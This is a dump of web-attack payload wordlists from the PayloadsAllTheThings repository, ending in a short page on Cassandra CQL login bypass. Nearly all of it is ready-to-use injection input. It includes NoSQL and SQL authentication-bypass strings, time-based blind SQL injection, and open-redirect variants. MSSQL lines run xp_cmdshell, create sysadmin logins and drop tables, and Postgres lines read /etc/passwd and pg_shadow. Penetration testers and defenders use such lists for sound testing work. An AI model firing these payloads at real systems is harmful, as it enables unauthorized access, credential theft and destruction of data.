Dump](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#mini-dump) 9 | - [Pass The Hash](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#pass-the-hash) 10 | - [Golden ticket](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#golden-ticket) 11 | - [Skeleton key](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#skeleton-key) 12 | - [RDP Session Takeover](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#rdp-session-takeover) 13 | - [RDP Passwords](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#rdp-passwords) 14 | - [Credential Manager & DPAPI](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#credential-manager--dpapi) 15 | - [Chrome Cookies & Credential](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#chrome-cookies--credential) 16 | - [Task Scheduled credentials](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#task-scheduled-credentials) 17 | - [Vault](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#vault) 18 | - [Commands list](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#commands-list) 19 | - [Powershell version](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#powershell-version) 20 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#references) 21 | -------------------------------------------------------------------------------- /NoSQL Injection/Intruder/MongoDB.txt: -------------------------------------------------------------------------------- 1 | true, $where: '1 == 1' 2 | , $where: '1 == 1' 3 | $where: '1 == 1' 4 | ', $where: '1 == 1' 5 | 1, $where: '1 == 1' 6 | { $ne: 1 } 7 | ', $or: [ {}, 
{ 'a':'a 8 | ' } ], $comment:'successful MongoDB injection' 9 | db.injection.insert({success:1}); 10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 11 | || 1==1 12 | ' && this.password.match(/.*/)//+%00 13 | ' && this.passwordzz.match(/.*/)//+%00 14 | '%20%26%26%20this.password.match(/.*/)//+%00 15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00 16 | {$gt: ''} 17 | [$ne]=1 18 | ';return 'a'=='a' && ''==' 19 | ";return(true);var xyz='a 20 | 0;return true -------------------------------------------------------------------------------- /NoSQL Injection/Intruder/NoSQL.txt: -------------------------------------------------------------------------------- 1 | true, $where: '1 == 1' 2 | , $where: '1 == 1' 3 | $where: '1 == 1' 4 | ', $where: '1 == 1' 5 | 1, $where: '1 == 1' 6 | { $ne: 1 } 7 | ', $or: [ {}, { 'a':'a 8 | ' } ], $comment:'successful MongoDB injection' 9 | db.injection.insert({success:1}); 10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 11 | || 1==1 12 | ' && this.password.match(/.*/)//+%00 13 | ' && this.passwordzz.match(/.*/)//+%00 14 | '%20%26%26%20this.password.match(/.*/)//+%00 15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00 16 | {$gt: ''} 17 | {"$gt": ""} 18 | [$ne]=1 19 | ';sleep(5000); 20 | ';sleep(5000);' 21 | ';sleep(5000);+' 22 | ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); 23 | ';return 'a'=='a' && ''==' 24 | ";return(true);var xyz='a 25 | 0;return true -------------------------------------------------------------------------------- /Open Redirect/Intruder/open_redirect_wordlist.txt: -------------------------------------------------------------------------------- 1 | /http://example.com 2 | /%5cexample.com 3 | /%2f%2fexample.com 4 | /example.com/%2f%2e%2e 5 | /http:/example.com 6 | /?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com 7 | 
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com 8 | /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com 9 | /redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com 10 | /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com 11 | /redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com 12 | /.example.com 13 | ///\;@example.com 14 | ///example.com/ 15 | ///example.com 16 | ///example.com/%2f.. 17 | /////example.com/ 18 | /////example.com -------------------------------------------------------------------------------- /Open Redirect/Intruder/openredirects.txt: -------------------------------------------------------------------------------- 1 | /%09/example.com 2 | /%2f%2fexample.com 3 | /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/ 4 | /%5cexample.com 5 | /%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d 6 | /.example.com 7 | //%09/example.com 8 | //%5cexample.com 9 | ///%09/example.com 10 | ///%5cexample.com 11 | ////%09/example.com 12 | ////%5cexample.com 13 | /////example.com 14 | /////example.com/ 15 | ////\;@example.com 16 | ////example.com/ 17 | ////example.com/%2e%2e 18 | ////example.com/%2e%2e%2f 19 | ////example.com/%2f%2e%2e 20 | ////example.com/%2f.. 21 | ////example.com// 22 | ///\;@example.com 23 | ///example.com 24 | ///example.com/ 25 | ///example.com/%2e%2e 26 | ///example.com/%2e%2e%2f 27 | ///example.com/%2f%2e%2e 28 | ///example.com/%2f.. 29 | ///example.com// 30 | //example.com 31 | //example.com/ 32 | //example.com/%2e%2e 33 | //example.com/%2e%2e%2f 34 | //example.com/%2f%2e%2e 35 | //example.com/%2f.. 
36 | //example.com// 37 | //google%00.com 38 | //google%E3%80%82com 39 | //https:///example.com/%2e%2e 40 | //https://example.com/%2e%2e%2f 41 | //https://example.com// 42 | /<>//example.com 43 | /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com 44 | /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com 45 | /?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com 46 | /\/\/example.com/ 47 | /\/example.com/ 48 | /example.com/%2f%2e%2e 49 | /http://%67%6f%6f%67%6c%65%2e%63%6f%6d 50 | /http://example.com 51 | /http:/example.com 52 | /https:/%5cexample.com/ 53 | /https://%09/example.com 54 | /https://%5cexample.com 55 | /https:///example.com/%2e%2e 56 | /https:///example.com/%2f%2e%2e 57 | /https://example.com 58 | /https://example.com/ 59 | /https://example.com/%2e%2e 60 | /https://example.com/%2e%2e%2f 61 | /https://example.com/%2f%2e%2e 62 | /https://example.com/%2f.. 
63 | /https://example.com// 64 | /https:example.com 65 | /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com 66 | /redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com 67 | /redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com 68 | -------------------------------------------------------------------------------- /SAML Injection/Images/SAML-xml-flaw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/SAML Injection/Images/SAML-xml-flaw.png -------------------------------------------------------------------------------- /SAML Injection/Images/XSLT1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/SAML Injection/Images/XSLT1.jpg -------------------------------------------------------------------------------- /SQL Injection/Cassandra Injection.md: -------------------------------------------------------------------------------- 1 | # Cassandra Injection 2 | 3 | > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system. 
4 | 5 | ## Summary 6 | 7 | * [CQL Injection Limitations](#cql-injection-limitations) 8 | * [Cassandra Comment](#cassandra-comment) 9 | * [Cassandra Login Bypass](#cassandra-login-bypass) 10 | * [Example #1](#example-1) 11 | * [Example #2](#example-2) 12 | * [References](#references) 13 | 14 | ## CQL Injection Limitations 15 | 16 | * Cassandra is a non-relational database, so CQL doesn't support `JOIN` or `UNION` statements, which makes cross-table queries more challenging. 17 | 18 | * Additionally, Cassandra lacks convenient built-in functions like `DATABASE()` or `USER()` for retrieving database metadata. 19 | 20 | * Another limitation is the absence of the `OR` operator in CQL, which prevents creating always-true conditions; for instance, a query like `SELECT * FROM table WHERE col1='a' OR col2='b';` will be rejected. 21 | 22 | * Time-based SQL injections, which typically rely on functions like `SLEEP()` to introduce a delay, are also difficult to execute in CQL since it doesn’t include a `SLEEP()` function. 23 | 24 | * CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected. 
25 | 26 | ## Cassandra Comment 27 | 28 | ```sql 29 | /* Cassandra Comment */ 30 | ``` 31 | 32 | ## Cassandra Login Bypass 33 | 34 | ### Example #1 35 | 36 | ```sql 37 | username: admin' ALLOW FILTERING; %00 38 | password: ANY 39 | ``` 40 | 41 | ### Example #2 42 | 43 | ```sql 44 | username: admin'/* 45 | password: */and pass>' 46 | ``` 47 | 48 | With these inputs, the resulting query would look like the following: 49 | 50 | ```sql 51 | SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING; 52 | ``` 53 | 54 | ## References 55 | 56 | * [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/) 57 | * [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra/) 58 | -------------------------------------------------------------------------------- /SQL Injection/Images/PostgreSQL_cmd_exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/SQL Injection/Images/PostgreSQL_cmd_exec.png -------------------------------------------------------------------------------- /SQL Injection/Images/Unicode_SQL_injection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/SQL Injection/Images/Unicode_SQL_injection.png -------------------------------------------------------------------------------- /SQL Injection/Images/wildcard_underscore.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/SQL
Injection/Images/wildcard_underscore.jpg -------------------------------------------------------------------------------- /SQL Injection/Intruder/Auth_Bypass.txt: -------------------------------------------------------------------------------- 1 | '-' 2 | ' ' 3 | '&' 4 | '^' 5 | '*' 6 | ' or ''-' 7 | ' or '' ' 8 | ' or ''&' 9 | ' or ''^' 10 | ' or ''*' 11 | "-" 12 | " " 13 | "&" 14 | "^" 15 | "*" 16 | " or ""-" 17 | " or "" " 18 | " or ""&" 19 | " or ""^" 20 | " or ""*" 21 | or true-- 22 | " or true-- 23 | ' or true-- 24 | ") or true-- 25 | ') or true-- 26 | ' or 'x'='x 27 | ') or ('x')=('x 28 | ')) or (('x'))=(('x 29 | " or "x"="x 30 | ") or ("x")=("x 31 | ")) or (("x"))=(("x 32 | or 1=1 33 | or 1=1-- 34 | or 1=1# 35 | or 1=1/* 36 | admin' -- 37 | admin' # 38 | admin'/* 39 | admin' or '1'='1 40 | admin' or '1'='1'-- 41 | admin' or '1'='1'# 42 | admin' or '1'='1'/* 43 | admin'or 1=1 or ''=' 44 | admin' or 1=1 45 | admin' or 1=1-- 46 | admin' or 1=1# 47 | admin' or 1=1/* 48 | admin') or ('1'='1 49 | admin') or ('1'='1'-- 50 | admin') or ('1'='1'# 51 | admin') or ('1'='1'/* 52 | admin') or '1'='1 53 | admin') or '1'='1'-- 54 | admin') or '1'='1'# 55 | admin') or '1'='1'/* 56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 57 | admin" -- 58 | admin" # 59 | admin"/* 60 | admin" or "1"="1 61 | admin" or "1"="1"-- 62 | admin" or "1"="1"# 63 | admin" or "1"="1"/* 64 | admin"or 1=1 or ""=" 65 | admin" or 1=1 66 | admin" or 1=1-- 67 | admin" or 1=1# 68 | admin" or 1=1/* 69 | admin") or ("1"="1 70 | admin") or ("1"="1"-- 71 | admin") or ("1"="1"# 72 | admin") or ("1"="1"/* 73 | admin") or "1"="1 74 | admin") or "1"="1"-- 75 | admin") or "1"="1"# 76 | admin") or "1"="1"/* 77 | 1' or 1.e(1) or '1'='1 78 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 79 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/Auth_Bypass2.txt: 
-------------------------------------------------------------------------------- 1 | == 2 | = 3 | ' 4 | ' -- 5 | ' # 6 | ' – 7 | '-- 8 | '/* 9 | '# 10 | " -- 11 | " # 12 | "/* 13 | ' and 1='1 14 | ' and a='a 15 | or 1=1 16 | or true 17 | ' or ''=' 18 | " or ""=" 19 | 1′) and '1′='1– 20 | ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 21 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 22 | and 1=1 23 | and 1=1– 24 | ' and 'one'='one 25 | ' and 'one'='one– 26 | ' group by password having 1=1-- 27 | ' group by userid having 1=1-- 28 | ' group by username having 1=1-- 29 | like '%' 30 | or 0=0 -- 31 | or 0=0 # 32 | or 0=0 – 33 | ' or 0=0 # 34 | ' or 0=0 -- 35 | ' or 0=0 # 36 | ' or 0=0 – 37 | " or 0=0 -- 38 | " or 0=0 # 39 | " or 0=0 – 40 | %' or '0'='0 41 | or 1=1 42 | or 1=1-- 43 | or 1=1/* 44 | or 1=1# 45 | or 1=1– 46 | ' or 1=1-- 47 | ' or '1'='1 48 | ' or '1'='1'-- 49 | ' or '1'='1'/* 50 | ' or '1'='1'# 51 | ' or '1′='1 52 | ' or 1=1 53 | ' or 1=1 -- 54 | ' or 1=1 – 55 | ' or 1=1-- 56 | ' or 1=1;# 57 | ' or 1=1/* 58 | ' or 1=1# 59 | ' or 1=1– 60 | ') or '1'='1 61 | ') or '1'='1-- 62 | ') or '1'='1'-- 63 | ') or '1'='1'/* 64 | ') or '1'='1'# 65 | ') or ('1'='1 66 | ') or ('1'='1-- 67 | ') or ('1'='1'-- 68 | ') or ('1'='1'/* 69 | ') or ('1'='1'# 70 | 'or'1=1 71 | 'or'1=1′ 72 | " or "1"="1 73 | " or "1"="1"-- 74 | " or "1"="1"/* 75 | " or "1"="1"# 76 | " or 1=1 77 | " or 1=1 -- 78 | " or 1=1 – 79 | " or 1=1-- 80 | " or 1=1/* 81 | " or 1=1# 82 | " or 1=1– 83 | ") or "1"="1 84 | ") or "1"="1"-- 85 | ") or "1"="1"/* 86 | ") or "1"="1"# 87 | ") or ("1"="1 88 | ") or ("1"="1"-- 89 | ") or ("1"="1"/* 90 | ") or ("1"="1"# 91 | ) or '1′='1– 92 | ) or ('1′='1– 93 | ' or 1=1 LIMIT 1;# 94 | 'or 1=1 or ''=' 95 | "or 1=1 or ""=" 96 | ' or 'a'='a 97 | ' or a=a-- 98 | ' or a=a– 99 | ') or ('a'='a 100 | " or "a"="a 101 | ") or ("a"="a 102 | ') or ('a'='a and hi") or ("a"="a 103 | ' or 'one'='one 104 | ' or 'one'='one– 105 | ' or uid like '% 106 | 
' or uname like '% 107 | ' or userid like '% 108 | ' or user like '% 109 | ' or username like '% 110 | ' or 'x'='x 111 | ') or ('x'='x 112 | " or "x"="x 113 | ' OR 'x'='x'#; 114 | '=' 'or' and '=' 'or' 115 | ' UNION ALL SELECT 1, @@version;# 116 | ' UNION ALL SELECT system_user(),user();# 117 | ' UNION select table_schema,table_name FROM information_Schema.tables;# 118 | admin' and substring(password/text(),1,1)='7 119 | ' and substring(password/text(),1,1)='7 120 | ' or 1=1 limit 1 -- -+ 121 | '="or' 122 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' /* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay '0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | "))))) waitfor delay '0:0:20' -- 37 | ')))))) 
waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL.txt: -------------------------------------------------------------------------------- 1 | # you will need to customize/modify some of the values in the queries for best effect 2 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 3 | 'create user name identified by 'pass123' -- 4 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 5 | ' ; drop table temp -- 6 | 'exec sp_addlogin 'name' , 'password' -- 7 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 8 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 9 | ' grant connect to name; grant resource to name; -- 10 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 11 | ' or 1=1 -- 12 | ' union (select @@version) -- 13 | ' union (select NULL, (select @@version)) -- 14 | ' union (select NULL, NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 17 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 18 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL_Enumeration.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/SQL Injection/Intruder/FUZZDB_MSSQL_Enumeration.txt -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MYSQL.txt: 
-------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MySQL-WHERE_Time.txt: -------------------------------------------------------------------------------- 1 | and 0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 0=benchmark(3000000,MD5(1))%20-- 27 | ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 
0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 0=benchmark(3000000,MD5(1))%20-- 42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | ")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt: -------------------------------------------------------------------------------- 1 | # mysql local file disclosure through sqli 2 | # fuzz interesting absolute filepath/filename into 3 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; 4 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_Postgres_Enumeration.txt: -------------------------------------------------------------------------------- 1 | # info disclosure payload fuzzfile for pgsql 2 | select version(); 3 | select current_database(); 4 | select current_user; 5 | select session_user; 6 | select current_setting('log_connections'); 7 | select current_setting('log_statement'); 8 | select current_setting('port'); 9 | select current_setting('password_encryption'); 10 | select current_setting('krb_server_keyfile'); 11 | select current_setting('virtual_host'); 12 | select current_setting('port'); 13 | select current_setting('config_file'); 14 | select current_setting('hba_file'); 15 | select current_setting('data_directory'); 16 | select * from pg_shadow; 17 | select * from pg_group; 18 | create table myfile (input TEXT); 19 | copy myfile from '/etc/passwd'; 20 | select * from myfile;copy myfile to /tmp/test; 21 | 
-------------------------------------------------------------------------------- /SQL Injection/Intruder/Generic_Fuzz.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 1' 3 | 1" 4 | [1] 5 | 1` 6 | 1\ 7 | 1/*'*/ 8 | 1/*!1111'*/ 9 | 1'||'asd'||' 10 | 1' or '1'='1 11 | 1 or 1=1 12 | 'or''=' -------------------------------------------------------------------------------- /SQL Injection/Intruder/SQL-Injection: -------------------------------------------------------------------------------- 1 | ' 2 | '' 3 | ` 4 | `` 5 | , 6 | " 7 | "" 8 | / 9 | // 10 | \ 11 | \\ 12 | ; 13 | ' or " 14 | -- or # 15 | ' OR '1 16 | ' OR 1 -- - 17 | " OR "" = " 18 | " OR 1 = 1 -- - 19 | ' OR '' = ' 20 | '=' 21 | 'LIKE' 22 | '=0--+ 23 | OR 1=1 24 | ' OR 'x'='x 25 | ' AND id IS NULL; -- 26 | '''''''''''''UNION SELECT '2 27 | %00 28 | /*…*/ 29 | + addition, concatenate (or space in url) 30 | || (double pipe) concatenate 31 | % wildcard attribute indicator 32 | @variable local variable 33 | @@variable global variable 34 | # Numeric 35 | AND 1 36 | AND 0 37 | AND true 38 | AND false 39 | 1-false 40 | 1-true 41 | 1*56 42 | -2 43 | 1' ORDER BY 1--+ 44 | 1' ORDER BY 2--+ 45 | 1' ORDER BY 3--+ 46 | 1' ORDER BY 1,2--+ 47 | 1' ORDER BY 1,2,3--+ 48 | 1' GROUP BY 1,2,--+ 49 | 1' GROUP BY 1,2,3--+ 50 | ' GROUP BY columnnames having 1=1 -- 51 | -1' UNION SELECT 1,2,3--+ 52 | ' UNION SELECT sum(columnname ) from tablename -- 53 | -1 UNION SELECT 1 INTO @,@ 54 | -1 UNION SELECT 1 INTO @,@,@ 55 | 1 AND (SELECT * FROM Users) = 1 56 | ' AND MID(VERSION(),1,1) = '5'; 57 | ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- 58 | Finding the table name 59 | Time-Based: 60 | ,(select * from (select(sleep(10)))a) 61 | %2c(select%20*%20from%20(select(sleep(10)))a) 62 | ';WAITFOR DELAY '0:0:30'-- 63 | Comments: 64 | # Hash comment 65 | /* C-style comment 66 | -- - SQL comment 67 | ;%00 Nullbyte 68 | ` Backtick 69 | 
-------------------------------------------------------------------------------- /SQL Injection/Intruder/SQLi_Polyglots.txt: -------------------------------------------------------------------------------- 1 | SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ 2 | SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample 3 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/payloads-sql-blind-MSSQL-WHERE: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' /* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay '0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | 
"))))) waitfor delay '0:0:20' -- 37 | ')))))) waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- 41 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY: -------------------------------------------------------------------------------- 1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 10 | 